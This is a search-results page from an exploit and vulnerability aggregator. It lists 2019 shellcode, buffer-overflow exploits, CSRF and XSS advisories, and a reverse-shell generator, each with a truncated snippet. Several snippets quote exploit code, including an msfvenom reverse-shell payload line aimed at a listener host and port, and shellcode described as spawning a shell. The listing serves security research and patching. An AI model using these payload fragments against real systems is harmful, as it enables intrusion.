Lucene search
+L

7481 matches found

zdt
zdt
added 2019/09/09 12:0 a.m.31 views

Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)

/ ; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : https://gulyslae.github.io/ ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to 127.0.0.1:4444 and spawns a shell ; this code h...

7.4AI score
SaveExploits0
Kitploit
Kitploit
added 2019/09/08 8:30 p.m.137 views

Revshellgen - Reverse Shell Generator Written In Python.

Standalone python script for generating reverse shells easily and automating the boring stuff like URL encoding the command and setting up a listener. Download git clone https://github.com/t0thkr1s/revshellgen Install The script has 2 dependencies: pyperclip colorama You can install these by...

7.3AI score
SaveExploits0References1
FireEye
FireEye
added 2019/09/07 5:0 p.m.30 views

Open Sourcing StringSifter

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke...

0.4AI score
SaveExploits0References12
zdt
zdt
added 2019/09/06 12:0 a.m.16 views

Linux/x86 TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode

/ ; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free ; date : 04th sept, 2019 ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : https://gulyslae.github.io/ ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to 127.0.0.1:4444 and...

7.4AI score
SaveExploits0
OpenVAS
OpenVAS
added 2019/09/05 12:0 a.m.45 views

Fedora Update for nginx FEDORA-2019-7a0b45fdc4

The remote host is missing an update for the Copyright C 2019 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

8.2CVSS7.8AI score0.81556EPSS
SaveExploits1References2
Pen Test Partners Blog
Pen Test Partners Blog
added 2019/09/03 6:55 a.m.144 views

Pwning a Siemens Scalance ICS switch through ARM reversing

We’ve been working in industrial control systems security for a long time. Several of the team here used to work in OT control rooms or support SCADA environments. Whilst pen testing a ship control system, we noticed a heavy reliance on Siemens Scalance industrial ethernet switches, so bought a...

2.1CVSS6.2AI score0.00301EPSS
SaveExploits0
Packet Storm
Packet Storm
added 2019/09/02 12:0 a.m.272 views

ChaosPro 2.1 SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp LHOST=10.0.7.17 LPORT=4444 -e...

1AI score
SaveExploits0
zdt
zdt
added 2019/09/02 12:0 a.m.18 views

ChaosPro 2.0 - SEH Buffer Overflow Exploit

!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...

0.7AI score
SaveExploits0
exploitpack
exploitpack
added 2019/09/02 12:0 a.m.21 views

ChaosPro 2.1 - SEH Buffer Overflow

ChaosPro 2.1 - SEH Buffer Overflow !C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp...

1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2019/09/02 12:0 a.m.391 views

ChaosPro 3.1 - SEH Buffer Overflow

!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...

5.3AI score
SaveExploits0
Packet Storm
Packet Storm
added 2019/08/30 12:0 a.m.285 views

GGPowerShell / Windows PowerShell Remote Command Execution

from base64 import b64encode from base64 import b64decode from socket import import argparse,sys,socket,struct,re GGPowerShell Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r. Original advisory:...

0.4AI score
SaveExploits0
zdt
zdt
added 2019/08/30 12:0 a.m.44 views

GGPowerShell / Windows PowerShell Remote Command Execution Exploit

This python script mints a .ps file with an exploitable semicolon condition that allows for command execution from Microsoft Windows PowerShell. from base64 import b64encode from base64 import b64decode from socket import import argparse,sys,socket,struct,re GGPowerShell Microsoft Windows...

0.1AI score
SaveExploits0
Github Security Blog
Github Security Blog
added 2019/08/27 5:39 p.m.23 views

Cross-site Scripting in django-js-reverse

django-js-reverse aka Django JS Reverse before 0.9.1 has XSS via jsreverseinline...

6.1CVSS3.2AI score0.01035EPSS
SaveExploits0References7Affected Software1
OSV
OSV
added 2019/08/27 5:39 p.m.58 views

GHSA-VX6V-2RG6-865H Cross-site Scripting in django-js-reverse

django-js-reverse aka Django JS Reverse before 0.9.1 has XSS via jsreverseinline...

6.1CVSS5.9AI score0.01035EPSS
SaveExploits0References8
CNVD
CNVD
added 2019/08/27 12:0 a.m.5 views

django-js-reverse cross-site scripting vulnerability

django-js-reverse is a Django application for handling URL naming. A cross-site scripting vulnerability exists in versions prior to django-js-reverse 0.9.1, which can be exploited by an attacker to execute client-side code...

6.1CVSS6.3AI score0.01035EPSS
SaveExploits0References1
Veracode
Veracode
added 2019/08/26 8:17 a.m.23 views

Cross-site Scripting (XSS)

django-js-reverse is vulnerable to cross-site scripting XSS. The attack is possible because it does not escape the entities via jsreverseinline...

6.1CVSS2.5AI score0.01035EPSS
SaveExploits0References3Affected Software1
Packet Storm
Packet Storm
added 2019/08/26 12:0 a.m.199 views

openITCOCKPIT 3.6.1-2 Cross Site Request Forgery

Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE Google Dork: N/A Date: 26-08-2019 Exploit Author: Julian Rittweger Vendor Homepage: https://openitcockpit.io/ Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 Fixed in: 3.7.1 |...

0.3AI score0.01229EPSS
SaveExploits3
Exploit DB
Exploit DB
added 2019/08/26 12:0 a.m.343 views

openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery

Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE Google Dork: N/A Date: 26-08-2019 Exploit Author: Julian Rittweger Vendor Homepage: https://openitcockpit.io/ Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 Fixed in: 3.7.1 |...

6.1CVSS6.2AI score0.01229EPSS
SaveExploits3
Packet Storm
Packet Storm
added 2019/08/25 12:0 a.m.837 views

Realtek Managed Switch Controller RTL83xx Stack Overflow

SOT Subject Realtek Managed Switch Controller RTL83xx PoC 2019 bashis https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller Brief description 1. Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. all FW...

0.1AI score
SaveExploits0
OSV
OSV
added 2019/08/23 1:15 p.m.18 views

CVE-2019-15486

django-js-reverse aka Django JS Reverse before 0.9.1 has XSS via jsreverseinline...

6.1CVSS6.1AI score
SaveExploits0References2
Rows per page
Query Builder